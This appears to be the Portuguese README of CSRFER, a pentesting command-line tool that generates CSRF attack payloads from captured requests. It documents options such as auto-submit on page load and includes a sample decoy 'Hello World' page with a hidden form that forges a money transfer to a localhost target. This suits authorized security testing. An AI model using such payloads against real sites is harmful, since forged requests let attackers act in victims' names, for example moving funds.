
Ferramenta para gerar payloads CSRF com base em requisições vulneráveis.
_____ _________________ ___________
/ __ \/ ___| ___ \ ___| ___| ___ \
| / \/\ `--.| |_/ / |_ | |__ | |_/ /
| | `--. \ /| _| | __|| /
| \__/\/\__/ / |\ \| | | |___| |\ \
\____/\____/\_| \_\_| \____/\_| \_|
-.--.
) " '-,
',' 2 \_
\q \ . \
_.--' '----.__
/ ._ _.__ \__
_.'_.' \_ .-._\_ '-, }
(,/ _.---;-( . \ \ ~
____ ( .___\_\ \/_/
( '-._ \ \ |
'._ ),> _) >
'-._ c=' Cooo -._
'-._ '.
'-._ `\
snd '-._ '.
'-._ \
`~---'
CSRFER é uma ferramenta para gerar payloads CSRF, com base em requisições vulneráveis.
Ela analisa requisições fornecidas para gerar um formulário (form) ou uma requisição fetch. O payload pode então ser embutido em um template HTML.
npm install -g csrfer
Uso: csrfer [opções]
Opções:
--version Mostra o número da versão
-r, --request Caminho para o arquivo de requisição a ser utilizado
-m, --mode Modo para gerar o código. Opções disponíveis: form, fetch. (Padrão é form)
-a, --autosubmit Enviar automaticamente a requisição ao carregar a página
-s, --show Mostrar os campos do formulário (apenas no modo form)
-o, --output Enviar o payload para o arquivo especificado em vez do STDOUT
-t, --template Caminho para uma página de template HTML. Use o placeholder {{CONTENT}} para especificar onde
injetar o código (em HTML, não em JS)
-T, --defaulttemplate Use esta opção se desejar que o código seja injetado em uma página HTML padrão.
-h, --help Mostrar ajuda
Exemplos:
csrfer -r req.txt -m form -a Enviar automaticamente uma requisição de formulário
csrfer -r req.txt -m form -s Gerar e mostrar um formulário para ser enviado manualmente
csrfer -r req.txt -m fetch -t my_template.html Gera uma requisição fetch e utiliza a página de template fornecida
<!DOCTYPE html>
<html>
<head>
<title>This is Hello World page</title>
</head>
<body>
<h1>Hello World</h1>
<form id="csrf" name="csrf" action="http://localhost:8000/1.php" method="POST"
enctype="application/x-www-form-urlencoded"><input id='destination' name='destination' type='hidden'
value='123-123123-123' /><br><input id='amount' name='amount' type='hidden' value='50€' /><br><input
type='submit' value='submit'></form>
</body>
</html>
Este projeto está licenciado sob a licença MIT